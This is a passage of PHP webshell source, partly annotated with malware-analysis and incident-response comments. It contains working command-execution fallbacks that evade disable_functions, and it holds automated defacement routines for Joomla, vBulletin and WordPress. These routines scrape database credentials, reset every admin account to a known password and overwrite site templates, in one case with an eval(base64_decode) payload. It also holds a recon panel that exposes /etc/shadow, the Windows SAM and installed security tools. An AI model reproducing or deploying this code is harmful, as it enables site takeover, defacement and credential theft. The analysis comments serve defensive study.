        $ret=passthru($cmd); // output is written straight to the response; passthru() returns no value on success
        return $ret;
    }
    $funcs=array("shell_exec","exec","passthru","system","popen","perl_func");
    $d_functions=str_replace(" ","",$d_functions);
    $dis_funcs=explode(",",$d_functions);
    foreach($funcs as $safe)
    {
        if(!in_array($safe,$dis_funcs))
        {
            if($safe=="exec")
            {
                $ret=@exec($cmd);
                $ret=join("\n",$ret);
                return $ret;
            }
            elseif($safe=="system")
            {
                $ret=@system($cmd);
                return $ret;
            }
            elseif($safe=="passthru")
            {
                $ret=@passthru($cmd);
                return $ret;
            }
            elseif($safe=="shell_exec")
            {
                $ret=@shell_exec($cmd);
                return $ret;
            }
            elseif($safe=="popen")
            {
                $ret=@popen("$cmd",'r');
                if(is_resource($ret))
                {
                    while(@!feof($ret))
                        $read.=@fgets($ret);
                    @pclose($ret);
                    return $read;
                }
                return -1;
            }
            elseif($safe="proc_open") // assignment, not comparison — see header note
            {
                $cmdpipe=array(
                    0=>array('pipe','r'),
                    1=>array('pipe','w')
                );
                $resource=@proc_open($cmd,$cmdpipe,$pipes);
                if(@is_resource($resource))
                {
                    while(@!feof($pipes[1]))
                        $ret.=@fgets($pipes[1]);
                    @fclose($pipes[1]);
                    @proc_close($resource);
                    return $ret;
                }
                return -1;
            }
            elseif($safe=="perl_func") // unreachable: the previous branch always matches first
            {
                $ret=perlshell($command);
                return $ret;
            }
        }
    }
    return -1;
}
    // Returns the trimmed text between the $i-th occurrence of $marqueurDebutLien and the next
    // $marqueurFinLien. Used later in this file to scrape configuration values and hidden form-field
    // names out of fetched page source.
    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
    {
        $ar0=explode($marqueurDebutLien, $text);
        $ar1=explode($marqueurFinLien, $ar0[$i]);
        return trim($ar1[0]);
    }
1204 function changeindexjo($conf,$h,$site)
1205 {
1206 global $defcount;
1207 $dol = '$';
1208 $sitename = entre2v2($conf,$dol."sitename = '","';");
1209 $username = entre2v2($conf,$dol."user = '","';");
1210 $password = entre2v2($conf,$dol."password = '","';");
1211 $dbname = entre2v2($conf,$dol."db = '","';");
1212 $prefix = entre2v2($conf,$dol."dbprefix = '","';");
1213 $localhost = entre2v2($conf,$dol."host = '","';");
1214
1215 $co=randomt();
1216
1217 $link=mysql_connect($localhost,$username,$password) ;
1218 mysql_select_db($dbname,$link);
1219
1220 $tryChaningInfo = mysql_query("UPDATE ".$prefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
1221
1222 $req =mysql_query("SELECT * from `".$prefix."extensions` ");
1223
1224 if ( $req )
1225 {
1226 $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
1227 $data = mysql_fetch_array($req);
1228 $template_name=$data["template"];
1229
1230 $req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
1231 $data = mysql_fetch_array($req);
1232 $template_id=$data["extension_id"];
1233
1234 $url2 = $site_url =$site."/administrator/index.php";
1235
1236 $ch = curl_init();
1237 curl_setopt($ch, CURLOPT_URL, $url2);
1238 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1239 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1240 curl_setopt($ch, CURLOPT_HEADER, 1);
1241 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1242 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1243 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1244
1245 $buffer = curl_exec($ch);
1246
1247 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
1248 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
1249
1250 $url2=$site_url."/index.php";
1251 $ch = curl_init();
1252 curl_setopt($ch, CURLOPT_URL, $url2);
1253 curl_setopt($ch, CURLOPT_POST, 1);
1254 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
1255 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1256 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1257 curl_setopt($ch, CURLOPT_HEADER, 0);
1258 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1259 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1260 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1261 $buffer = curl_exec($ch);
1262 echo "<tr align =center>";
1263 echo '<td>admin : 123456789</td>';
1264 $pos = strpos($buffer,"com_config");
1265 if($pos === false)
1266 echo("<td>[-] Login Error</td>");
1267 else
1268 echo("<td><font class=txt>[+] Login Success</font></td>");
1269
1270 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
1271 $ch = curl_init();
1272 curl_setopt($ch, CURLOPT_URL, $url2);
1273 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1274 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1275 curl_setopt($ch, CURLOPT_HEADER, 0);
1276 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1277 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1278 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1279 $buffer = curl_exec($ch);
1280
1281 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
1282
1283 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1284
1285 $ch = curl_init();
1286 curl_setopt($ch, CURLOPT_URL, $url2);
1287 curl_setopt($ch, CURLOPT_POST, 1);
1288 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
1289
1290 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1291 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1292 curl_setopt($ch, CURLOPT_HEADER, 0);
1293 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1294 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1295 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1296 $buffer = curl_exec($ch);
1297
1298 $pos = strpos($buffer,'<dd class="message message">');
1299 if($pos === false)
1300 {
1301 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Defaced</td>");
1302 }
1303 else
1304 {
1305 $defcount++;
1306 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1307 }
1308 }
1309 else
1310 {
1311 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
1312 $data = mysql_fetch_array($req);
1313 $template_name=$data["template"];
1314
1315 $url2=$site_url."/index.php";
1316 $ch = curl_init();
1317 curl_setopt($ch, CURLOPT_URL, $url2);
1318 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1319 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1320 curl_setopt($ch, CURLOPT_HEADER, 1);
1321 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1322 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1323 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1324 $buffer = curl_exec($ch);
1325
1326 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
1327
1328 $url2=$site_url."/index.php";
1329 $ch = curl_init();
1330 curl_setopt($ch, CURLOPT_URL, $url2);
1331 curl_setopt($ch, CURLOPT_POST, 1);
1332 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
1333 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1334 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1335 curl_setopt($ch, CURLOPT_HEADER, 0);
1336 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1337 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1338 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1339 $buffer = curl_exec($ch);
1340
1341 $pos = strpos($buffer,"com_config");
1342 echo "<tr align =center>";
1343 echo '<td>admin : 123456789</td>';
1344 if($pos === false)
1345 echo("<td>[-] Login Error</td>");
1346 else
1347 echo("<td><font class=txt>[+] Login Success</font></td>");
1348
1349 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
1350 $ch = curl_init();
1351 curl_setopt($ch, CURLOPT_URL, $url2);
1352 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1353 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1354 curl_setopt($ch, CURLOPT_HEADER, 0);
1355 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1356 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1357 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1358 $buffer = curl_exec($ch);
1359
1360 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
1361
1362 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1363 $ch = curl_init();
1364 curl_setopt($ch, CURLOPT_URL, $url2);
1365 curl_setopt($ch, CURLOPT_POST, 1);
1366 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
1367 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1368 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1369 curl_setopt($ch, CURLOPT_HEADER, 0);
1370 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1371 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1372 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1373 $buffer = curl_exec($ch);
1374
1375 $pos = strpos($buffer,'<dd class="message message fade">');
1376 if($pos === false)
1377 {
1378 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Deface</td>");
1379 }
1380 else
1381 {
1382 $defcount++;
1383 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1384 }
1385 }
1386 echo "</tr>";
1387 }
 // Malware-analysis note: vBulletin defacement routine of this webshell.
 // $conf is the text of a vBulletin config.php; $index is the HTML the
 // operator wants displayed. DB credentials, name and table prefix are scraped
 // out of the config text with entre2v2() (defined elsewhere in this file),
 // the forum URL is read from `<prefix>setting` for the status line, and then
 // every row of `<prefix>template` is overwritten (the UPDATE has no WHERE)
 // with a template-syntax payload that eval()s a base64 blob echoing $index
 // and then exit()s.
 // IR indicator: a vBulletin template table whose rows all contain
 // "eval(base64_decode(" followed by "{${exit()}}".
 function changeindexvb($conf,$index)
 {
 $dol = '$'; // not used in this function
 
 $username = entre2v2($conf,"['MasterServer']['username'] = '","';");
 $password = entre2v2($conf,"['MasterServer']['password'] = '","';");
 $dbname = entre2v2($conf,"se']['dbname'] = '","';");
 $prefix = entre2v2($conf,"['Database']['tableprefix'] = '","';");
 $localhost = entre2v2($conf,"['MasterServer']['servername'] = '","';");
 
 $con =@ mysql_connect($localhost,$username,$password);
 $db =@ mysql_select_db($dbname,$con);
 $ss = mysql_query("SELECT * from `".$prefix."setting` WHERE varname='bburl'");
 $data = mysql_fetch_array($ss);
 
 echo "<tr align=center>";
 // Escape double quotes so $index survives being embedded in echo "...".
 $index=str_replace('"','\\"',$index);
 $attack = "{\${eval(base64_decode(\'";
 $attack .= base64_encode("echo \"$index\";");
 $attack .= "\'))}}{\${exit()}}</textarea>";
 // No WHERE clause: affects every template row, not just the index template.
 $query = "UPDATE ".$prefix."template SET template = '$attack'";
 $result =@ mysql_query($query,$con);
 if($result)
 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><font class=txt><blink>Vbulletin Forum Defaced Successfully</blink></font></td>";
 else
 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><blink>Cannot Deface Vbulletin Forum</blink></td>";
 echo "<tr>"; // opens a new row; presumably "</tr>" was intended
 }
 // Malware-analysis note: WordPress defacement routine of this webshell.
 // $conf is the text of a wp-config.php; $index is the replacement page.
 // Steps visible below: (1) scrape DB_USER/DB_PASSWORD/DB_NAME/DB_HOST and
 // $table_prefix from the config text; (2) UPDATE `<prefix>users` with no WHERE,
 // so every account gets user_login 'admin' and the same fixed user_pass hash;
 // (3) log in over HTTP as admin / 123456789 (the hash is presumably the
 // crypt-MD5 of that password — not verified here); (4) fetch the theme editor
 // for the active template to obtain the _wpnonce and file field; (5) POST the
 // new index.php content through theme-editor.php.
 // IR indicators: all wp_users rows sharing user_login 'admin' and the hash
 // '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'; a wp-login.php POST followed by
 // theme-editor.php requests carrying the User-Agent string set below; a
 // cookie jar named COOKIE.txt in the shell's working directory. The unlink at
 // the end uses $base_path while curl wrote a relative "COOKIE.txt", so the jar
 // may be left behind if those differ.
 function changeindexwp($conf,$index)
 {
 $index = urlencode($index);
 $dol = '$';
 $username = entre2v2($conf,"define('DB_USER', '","');");
 $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
 $dbname = entre2v2($conf,"define('DB_NAME', '","');");
 $prefix = entre2v2($conf,$dol."table_prefix = '","'");
 $host = entre2v2($conf,"define('DB_HOST', '","');");
 $con =@ mysql_connect($host,$username,$password);
 $db =@ mysql_select_db($dbname,$con);
 // No WHERE clause: every user row is rewritten, not only the administrator.
 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
 
 if($req1)
 {
 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
 $data = mysql_fetch_array($req);
 $site_url=$data["option_value"];
 
 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
 $data = mysql_fetch_array($req);
 $template = $data["option_value"];
 
 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
 $data = mysql_fetch_array($req);
 $current_theme = $data["option_value"]; // read but never used below
 
 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
 $url2=$site_url."/wp-login.php";
 
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $url2);
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
 curl_setopt($ch, CURLOPT_HEADER, 0);
 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
 $buffer = curl_exec($ch);
 
 $pos = strpos($buffer,"action=logout"); // login check result is never consulted
 
 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
 curl_setopt($ch, CURLOPT_URL, $url2);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
 curl_setopt($ch, CURLOPT_HEADER, 0);
 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
 $buffer0 = curl_exec($ch);
 
 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
 
 // No braces: only the "<tr>" line is conditional; the POST below always runs.
 if(substr_count($_file,"index.php") != 0)
 $output .= "<tr align =center>";
 $url2=$site_url."/wp-admin/theme-editor.php";
 curl_setopt($ch, CURLOPT_URL, $url2);
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
 curl_setopt($ch, CURLOPT_HEADER, 0);
 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
 $buffer = curl_exec($ch);
 curl_close($ch);
 $pos = strpos($buffer,'<div id="message" class="updated">');
 $cond = 0; // unused
 if($pos === false)
 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td>Cannot Deface</td>";
 else
 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td><font class=txt>Wordpress Defaced Successfully</font></td>";
 }
 else
 $output.= "<td colspan=2> DB Error</td>";
 echo $output."</tr>";
 global $base_path;
 unlink($base_path.'COOKIE.txt');
 }
/**
 * Report the `disable_functions` ini directive as a display string.
 *
 * @return string The raw comma-separated directive value, or "None" when it
 *                is empty or unavailable.
 */
function getDisabledFunctions()
{
    $disabled = ini_get('disable_functions');
    return $disabled ? @ini_get('disable_functions') : "None";
}
/**
 * Render a file's mode bits as an ls(1)-style string, e.g. "-rw-r--r--".
 *
 * The first character is the file type; the remaining nine are the owner,
 * group and world rwx triplets. In the execute position the setuid/setgid
 * bits are shown as 's' (with execute) / 'S' (without), and the sticky bit
 * as 't' / 'T'.
 *
 * @param string $file Path handed straight to fileperms().
 * @return string Ten-character mode string; the type is 'u' when no known
 *                type mask matches (which includes a failed fileperms()).
 */
function getFilePermissions($file)
{
    $perms = fileperms($file);

    // File-type masks, most specific first so a socket (0xC000) is not
    // misreported as a regular file (0x8000).
    $typeChars = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );
    $info = 'u';
    foreach ($typeChars as $mask => $char) {
        if (($perms & $mask) == $mask) {
            $info = $char;
            break;
        }
    }

    // One row per triplet: read bit, write bit, execute bit, the special bit
    // that shares the execute column, and its glyphs with / without execute.
    $triplets = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner, setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group, setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world, sticky
    );
    foreach ($triplets as $t) {
        list($r, $w, $x, $special, $withExec, $withoutExec) = $t;
        $info .= ($perms & $r) ? 'r' : '-';
        $info .= ($perms & $w) ? 'w' : '-';
        if ($perms & $x) {
            $info .= ($perms & $special) ? $withExec : 'x';
        } else {
            $info .= ($perms & $special) ? $withoutExec : '-';
        }
    }

    return $info;
}
/**
 * Wrap getFilePermissions() in a <font> whose class encodes this process's
 * access to the path: readperm = not readable, noperm = readable but not
 * writable, wrtperm = writable.
 *
 * @param string $filename Path to inspect.
 * @return string HTML fragment.
 */
function filepermscolor($filename)
{
    if (@is_readable($filename)) {
        $class = @is_writable($filename) ? 'wrtperm' : 'noperm';
    } else {
        $class = 'readperm';
    }
    return "<font class=" . $class . ">" . getFilePermissions($filename) . "</font>";
}
1574
/** Print the requesting client's address as the SAPI reports it. */
function yourip()
{
    print $_SERVER["REMOTE_ADDR"];
}
/** Print the running PHP version string. */
function phpver()
{
    print @phpversion();
}
/**
 * Print whether magic_quotes_gpc is on. Relies on get_magic_quotes_gpc(),
 * which no longer exists on PHP 8, so this fatals there.
 */
function magic_quote()
{
    if (get_magic_quotes_gpc()) {
        echo "<font class=txt>ON</font>";
    } else {
        echo "OFF";
    }
}
/** Print the address the request's Host header resolves to. */
function serverip()
{
    $resolved = @gethostbyname($_SERVER["HTTP_HOST"]);
    print $resolved;
}
/** Print the port the server accepted this request on. */
function serverport()
{
    print $_SERVER['SERVER_PORT'];
}
/**
 * Safe-mode status label, driven by the global $sm flag set elsewhere.
 *
 * @return string "OFF" when $sm is falsy, otherwise the warning label.
 */
function safe()
{
    global $sm;
    if ($sm) {
        return "ON :( :'( (Most of the Features will Not Work!)";
    }
    return "OFF";
}
/** Print the SERVER_ADMIN value the web server exposes. */
function serveradmin()
{
    print $_SERVER['SERVER_ADMIN'];
}
/** Print the uname string of the host. */
function systeminfo()
{
    print php_uname();
}
/** Print whether the curl extension is loaded (checks curl_version()). */
function curlinfo()
{
    if (function_exists('curl_version')) {
        echo "<font class=txt>Enabled</font>";
    } else {
        echo "Disabled";
    }
}
/** Print whether the legacy OCI8 ocilogon() function is available. */
function oracleinfo()
{
    if (function_exists('ocilogon')) {
        echo "<font class=txt>Enabled</font>";
    } else {
        echo "Disabled";
    }
}
/** Print whether the legacy mysql_connect() function is available. */
function mysqlinfo()
{
    if (function_exists('mysql_connect')) {
        echo "<font class=txt>Enabled</font>";
    } else {
        echo "Disabled";
    }
}
/** Print whether the legacy mssql_connect() function is available. */
function mssqlinfo()
{
    if (function_exists('mssql_connect')) {
        echo "<font class=txt>Enabled</font>";
    } else {
        echo "Disabled";
    }
}
/** Print whether the pgsql extension's pg_connect() is available. */
function postgresqlinfo()
{
    if (function_exists('pg_connect')) {
        echo "<font class=txt>Enabled</font>";
    } else {
        echo "Disabled";
    }
}
/** Print the SERVER_SOFTWARE environment value (empty when unset). */
function softwareinfo()
{
    $software = getenv("SERVER_SOFTWARE");
    print $software;
}
 // Serves a file from the shell's current working directory as an attachment.
 // The `download` query parameter is split on "/" and only the final segment
 // is kept (the loop is an unrolled basename()), so the path is resolved
 // relative to the process CWD rather than to the listed directory. Any
 // buffered page output is discarded first so only the raw bytes go out, and
 // the request exits afterwards.
 // IR indicator: responses from this script carrying
 // "Content-type: application/octet-stream" and a Content-disposition
 // attachment header, with a `download=` query string.
 function download()
 {
 $frd=$_GET['download'];
 $prd=explode("/",$frd);
 for($i=0;$i<sizeof($prd);$i++)
 {
 $nfd=$prd[$i]; // ends holding the last path segment only
 }
 @ob_clean();
 header("Content-type: application/octet-stream");
 header("Content-length: ".filesize($nfd));
 header("Content-disposition: attachment; filename=\"".$nfd."\";");
 readfile($nfd);
 
 exit;
 
 }
1650
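/**
 * Format a byte count for display, e.g. 1536 -> "1.5 KB".
 *
 * Divides by 1024 while the value is still strictly above 1024, so an exact
 * 1024 is reported as "1024 B" (existing behaviour, kept for callers that
 * compare the output). The unit index is now capped at the last known unit
 * so very large inputs render as "... PB" instead of reading an undefined
 * index past the unit list.
 *
 * @param int|float $size Byte count as returned by filesize().
 * @return string Value rounded to two decimals, a space, and the unit.
 */
function HumanReadableFilesize($size)
{
    $mod = 1024;
    $units = explode(' ', 'B KB MB GB TB PB');
    $last = count($units) - 1;
    $i = 0;
    // Stop at the last unit rather than indexing past $units.
    while ($size > $mod && $i < $last) {
        $size /= $mod;
        $i++;
    }
    return round($size, 2) . ' ' . $units[$i];
}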
1661
 // Emit one "changedir" link per Windows drive letter whose root (e.g. "C:\")
 // is a directory. On non-Windows hosts is_dir() fails for every letter and
 // nothing is printed. The global $self is declared but not used here.
 function showDrives()
 {
 global $self;
 foreach(range('A','Z') as $drive)
 {
 if(is_dir($drive.':\\'))
 {
 $myd = $drive.":\\";
 ?>
 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
 <?php echo $myd; ?>
 </a>
 <?php
 }
 }
 }
/**
 * Total size of the filesystem holding the directory in the global $dir.
 *
 * @return float|false Bytes, or false when disk_total_space() fails.
 */
function diskSpace()
{
    global $dir;
    $total = disk_total_space($dir);
    return $total;
}
/**
 * Free space on the filesystem holding the directory in the global $dir.
 *
 * @return float|false Bytes, or false when disk_free_space() fails.
 */
function freeSpace()
{
    global $dir;
    $free = disk_free_space($dir);
    return $free;
}
1688
/**
 * Locate a program on PATH via `which`, run through myexe() (defined
 * elsewhere in this file).
 *
 * @param string $p Program name; interpolated unquoted into the command.
 * @return string|false Output of `which`, or false when it printed nothing.
 */
function thiscmd($p)
{
    $located = myexe('which ' . $p);
    return empty($located) ? false : $located;
}
1696
 // Host reconnaissance panel of this webshell. Prints server software,
 // open_basedir / safe-mode paths, available DB client extensions, and on
 // Linux the distro, /proc and /etc details plus three PATH scans: build tools
 // ("Userful"), security products such as AV/HIDS/firewall/log monitors
 // ("Danger") and download utilities ("Downloaders"). On Windows it links
 // the SAM backup and hosts/network files for download or viewing.
 // IR note: the PATH scans run one `which <name>` per entry through myexe(),
 // so a burst of `which` children under the web-server user is the
 // process-tree signature of this panel. The nested myparam() is declared on
 // every call, so calling mysecinfo() twice in one request is a redeclare error.
 function mysecinfo()
 {
 // Print "label: value"; multi-line values go in a <pre>. Empty values are skipped.
 function myparam($n, $v)
 {
 $v = trim($v);
 if($v)
 {
 echo '<span><font size=3>' . $n . ': </font></span>';
 if(strpos($v, "\n") === false)
 echo '<font class=txt size=3>' . $v . '</font><br>';
 else
 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
 }
 }
 
 myparam('Server software', @getenv('SERVER_SOFTWARE'));
 if(function_exists('apache_get_modules'))
 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
 myparam('Open base dir', @ini_get('open_basedir'));
 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
 $temp=array();
 if(function_exists('mysql_get_client_info'))
 $temp[] = "MySql (".mysql_get_client_info().")";
 if(function_exists('mssql_connect'))
 $temp[] = "MSSQL";
 if(function_exists('pg_connect'))
 $temp[] = "PostgreSQL";
 if(function_exists('oci_connect'))
 $temp[] = "Oracle";
 myparam('Supported databases', implode(', ', $temp));
 echo '<br>';
 
 if($GLOBALS['os'] == 'Linux') {
 myparam('Distro : ', myexe("cat /etc/*-release"));
 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
 myparam('OS version', @file_get_contents('/proc/version'));
 myparam('Distro name', @file_get_contents('/etc/issue.net'));
 myparam('Where is Perl?', myexe('whereis perl'));
 myparam('Where is Python?', myexe('whereis python'));
 myparam('Where is gcc?', myexe('whereis gcc'));
 myparam('Where is apache?', myexe('whereis apache'));
 myparam('CPU?', myexe('cat /proc/cpuinfo'));
 myparam('RAM', myexe('free -m'));
 myparam('Mount options', myexe('cat /etc/fstab'));
 myparam('User Limits', myexe('ulimit -a'));
 
 
 // PATH scans are skipped when the global safe_mode flag is set.
 if(!$GLOBALS['safe_mode']) {
 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
 echo '<br>';
 $temp=array();
 foreach ($userful as $item)
 if(thiscmd($item))
 $temp[] = $item;
 myparam('Userful', implode(', ',$temp));
 $temp=array();
 foreach ($danger as $item)
 if(thiscmd($item))
 $temp[] = $item;
 myparam('Danger', implode(', ',$temp));
 $temp=array();
 foreach ($downloaders as $item)
 if(thiscmd($item))
 $temp[] = $item;
 myparam('Downloaders', implode(', ',$temp));
 echo '<br/>';
 myparam('HDD space', myexe('df -h'));
 myparam('Hosts', @file_get_contents('/etc/hosts'));
 
 }
 } else {
 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
 myparam('OS Version',myexe('ver'));
 myparam('Account Settings',myexe('net accounts'));
 myparam('User Accounts',myexe('net user'));
 }
 echo '</div>';
 }
1786
1787
1788
 // Command-execution fallback chain used throughout this shell: exec(),
 // passthru(), system(), shell_exec() and finally popen(), in that order,
 // taking the first one that still exists. function_exists() reports a
 // function listed in `disable_functions` as missing, so the chain simply
 // moves on to the next primitive.
 // Hardening note: this is why disabling only exec() has no effect here; all
 // five names (and proc_open, which exec_all() below also tries) have to be
 // disabled together.
 // Returns the command's combined output as a string ('' if nothing ran).
 function myexe($in)
 {
 $out = '';
 if (function_exists('exec')) {
 @exec($in,$out);
 $out = @join("\n",$out);
